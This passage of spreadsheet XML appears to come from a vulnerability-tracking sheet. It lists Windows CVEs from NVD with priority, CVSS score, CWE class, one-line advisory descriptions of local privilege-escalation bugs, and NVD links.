        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69478</t>
        </is>
      </c>
      <c r="D851" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E851" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F851" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G851" s="5" t="inlineStr"/>
      <c r="H851" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I851" s="5" t="inlineStr"/>
      <c r="J851" s="5" t="inlineStr"/>
      <c r="K851" s="5" t="inlineStr"/>
      <c r="L851" s="5" t="inlineStr"/>
      <c r="M851" s="5" t="inlineStr"/>
      <c r="N851" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O851" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P851" s="5" t="inlineStr"/>
      <c r="Q851" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R851" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69478</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69480</t>
        </is>
      </c>
      <c r="D852" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E852" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F852" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G852" s="5" t="inlineStr"/>
      <c r="H852" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I852" s="5" t="inlineStr"/>
      <c r="J852" s="5" t="inlineStr"/>
      <c r="K852" s="5" t="inlineStr"/>
      <c r="L852" s="5" t="inlineStr"/>
      <c r="M852" s="5" t="inlineStr"/>
      <c r="N852" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O852" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P852" s="5" t="inlineStr"/>
      <c r="Q852" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R852" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69480</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="D853" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E853" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F853" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G853" s="5" t="inlineStr"/>
      <c r="H853" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I853" s="5" t="inlineStr"/>
      <c r="J853" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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53" s="5" t="inlineStr"/>
      <c r="M853" s="5" t="inlineStr"/>
      <c r="N853" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O853" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P853" s="5" t="inlineStr"/>
      <c r="Q853" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R853" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69508</t>
        </is>
      </c>
      <c r="D854" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E854" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F854" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G854" s="5" t="inlineStr"/>
      <c r="H854" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I854" s="5" t="inlineStr"/>
      <c r="J854" s="5" t="inlineStr"/>
      <c r="K854" s="5" t="inlineStr"/>
      <c r="L854" s="5" t="inlineStr"/>
      <c r="M854" s="5" t="inlineStr"/>
      <c r="N854" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P854" s="5" t="inlineStr"/>
      <c r="Q854" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R854" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69508</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69509</t>
        </is>
      </c>
      <c r="D855" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E855" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F855" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G855" s="5" t="inlineStr"/>
      <c r="H855" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I855" s="5" t="inlineStr"/>
      <c r="J855" s="5" t="inlineStr"/>
      <c r="K855" s="5" t="inlineStr"/>
      <c r="L855" s="5" t="inlineStr"/>
      <c r="M855" s="5" t="inlineStr"/>
      <c r="N855" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O855" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P855" s="5" t="inlineStr"/>
      <c r="Q855" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="R855" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69509</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69513</t>
        </is>
      </c>
      <c r="D856" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E856" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F856" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G856" s="5" t="inlineStr"/>
      <c r="H856" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I856" s="5" t="inlineStr"/>
      <c r="J856" s="5" t="inlineStr"/>
      <c r="K856" s="5" t="inlineStr"/>
      <c r="L856" s="5" t="inlineStr"/>
      <c r="M856" s="5" t="inlineStr"/>
      <c r="N856" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O856" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P856" s="5" t="inlineStr"/>
      <c r="Q856" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R856" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69513</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69528</t>
        </is>
      </c>
      <c r="D857" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E857" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F857" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G857" s="5" t="inlineStr"/>
      <c r="H857" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I857" s="5" t="inlineStr"/>
      <c r="J857" s="5" t="inlineStr"/>
      <c r="K857" s="5" t="inlineStr"/>
      <c r="L857" s="5" t="inlineStr"/>
      <c r="M857" s="5" t="inlineStr"/>
      <c r="N857" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O857" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P857" s="5" t="inlineStr"/>
      <c r="Q857" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R857" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69528</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69532</t>
        </is>
      </c>
      <c r="D858" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E858" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F858" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G858" s="5" t="inlineStr"/>
      <c r="H858" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I858" s="5" t="inlineStr"/>
      <c r="J858" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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58" s="5" t="inlineStr"/>
      <c r="M858" s="5" t="inlineStr"/>
      <c r="N858" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O858" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P858" s="5" t="inlineStr"/>
      <c r="Q858" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R858" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69534</t>
        </is>
      </c>
      <c r="D859" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E859" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F859" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G859" s="5" t="inlineStr"/>
      <c r="H859" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I859" s="5" t="inlineStr"/>
      <c r="J859" s="5" t="inlineStr"/>
      <c r="K859" s="5" t="inlineStr"/>
      <c r="L859" s="5" t="inlineStr"/>
      <c r="M859" s="5" t="inlineStr"/>
      <c r="N859" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O859" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P859" s="5" t="inlineStr"/>
      <c r="Q859" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R859" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69534</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69535</t>
        </is>
      </c>
      <c r="D860" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E860" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F860" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G860" s="5" t="inlineStr"/>
      <c r="H860" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I860" s="5" t="inlineStr"/>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr"/>
      <c r="L860" s="5" t="inlineStr"/>
      <c r="M860" s="5" t="inlineStr"/>
      <c r="N860" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O860" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P860" s="5" t="inlineStr"/>
      <c r="Q860" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="R860" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69535</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69538</t>
        </is>
      </c>
      <c r="D861" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E861" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F861" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G861" s="5" t="inlineStr"/>
      <c r="H861" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I861" s="5" t="inlineStr"/>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr"/>
      <c r="L861" s="5" t="inlineStr"/>
      <c r="M861" s="5" t="inlineStr"/>
      <c r="N861" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O861" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P861" s="5" t="inlineStr"/>
      <c r="Q861" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R861" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69538</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69541</t>
        </is>
      </c>
      <c r="D862" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E862" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F862" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G862" s="5" t="inlineStr"/>
      <c r="H862" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I862" s="5" t="inlineStr"/>
      <c r="J862" s="5" t="inlineStr"/>
      <c r="K862" s="5" t="inlineStr"/>
      <c r="L862" s="5" t="inlineStr"/>
      <c r="M862" s="5" t="inlineStr"/>
      <c r="N862" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O862" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P862" s="5" t="inlineStr"/>
      <c r="Q862" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R862" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69541</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69542</t>
        </is>
      </c>
      <c r="D863" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E863" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F863" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G863" s="5" t="inlineStr"/>
      <c r="H863" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I863" s="5" t="inlineStr"/>
      <c r="J863" s="5" t="inlineStr"/>
      <c r="K863" s="5" t="inlineStr"/>
      <c r="L863" s="5" t="inlineStr"/>
      <c r="M863" s="5" t="inlineStr"/>
      <c r="N863" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O863" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P863" s="5" t="inlineStr"/>
      <c r="Q863" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R863" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Camera Frame Server Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69542</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69544</t>
        </is>
      </c>
      <c r="D864" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E864" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F864" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G864" s="5" t="inlineStr"/>
      <c r="H864" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I864" s="5" t="inlineStr"/>
      <c r="J864" s="5" t="inlineStr"/>
      <c r="K864" s="5" t="inlineStr"/>
      <c r="L864" s="5" t="inlineStr"/>
      <c r="M864" s="5" t="inlineStr"/>
      <c r="N864" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O864" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P864" s="5" t="inlineStr"/>
      <c r="Q864" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R864" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows SMB Client allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69544</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69561</t>
        </is>
      </c>
      <c r="D865" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E865" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F865" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G865" s="5" t="inlineStr"/>
      <c r="H865" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I865" s="5" t="inlineStr"/>
      <c r="J865" s="5" t="inlineStr"/>
      <c r="K865" s="5" t="inlineStr"/>
      <c r="L865" s="5" t="inlineStr"/>
      <c r="M865" s="5" t="inlineStr"/>
      <c r="N865" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O865" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P865" s="5" t="inlineStr"/>
      <c r="Q865" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R865" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69561</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="D866" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E866" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F866" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G866" s="5" t="inlineStr"/>
      <c r="H866" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I866" s="5" t="inlineStr"/>
      <c r="J866" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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66" s="5" t="inlineStr"/>
      <c r="M866" s="5" t="inlineStr"/>
      <c r="N866" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O866" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P866" s="5" t="inlineStr"/>
      <c r="Q866" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R866" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69576</t>
        </is>
      </c>
      <c r="D867" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E867" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F867" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G867" s="5" t="inlineStr"/>
      <c r="H867" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I867" s="5" t="inlineStr"/>
      <c r="J867" s="5" t="inlineStr"/>
      <c r="K867" s="5" t="inlineStr"/>
      <c r="L867" s="5" t="inlineStr"/>
      <c r="M867" s="5" t="inlineStr"/>
      <c r="N867" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O867" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P867" s="5" t="inlineStr"/>
      <c r="Q867" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R867" s="5" t="inlineStr">
        <is>
          <t>Use after free in Graphic Fonts allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69576</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B868" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69580</t>
        </is>
      </c>
      <c r="D868" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E868" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F868" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G868" s="5" t="inlineStr"/>
      <c r="H868" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I868" s="5" t="inlineStr"/>
      <c r="J868" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K86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68" s="5" t="inlineStr"/>
      <c r="M868" s="5" t="inlineStr"/>
      <c r="N868" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O868" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P868" s="5" t="inlineStr"/>
      <c r="Q868" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R868" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B869" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69582</t>
        </is>
      </c>
      <c r="D869" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E869" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F869" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G869" s="5" t="inlineStr"/>
      <c r="H869" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I869" s="5" t="inlineStr"/>
      <c r="J869" s="5" t="inlineStr"/>
      <c r="K869" s="5" t="inlineStr"/>
      <c r="L869" s="5" t="inlineStr"/>
      <c r="M869" s="5" t="inlineStr"/>
      <c r="N869" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O869" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P869" s="5" t="inlineStr"/>
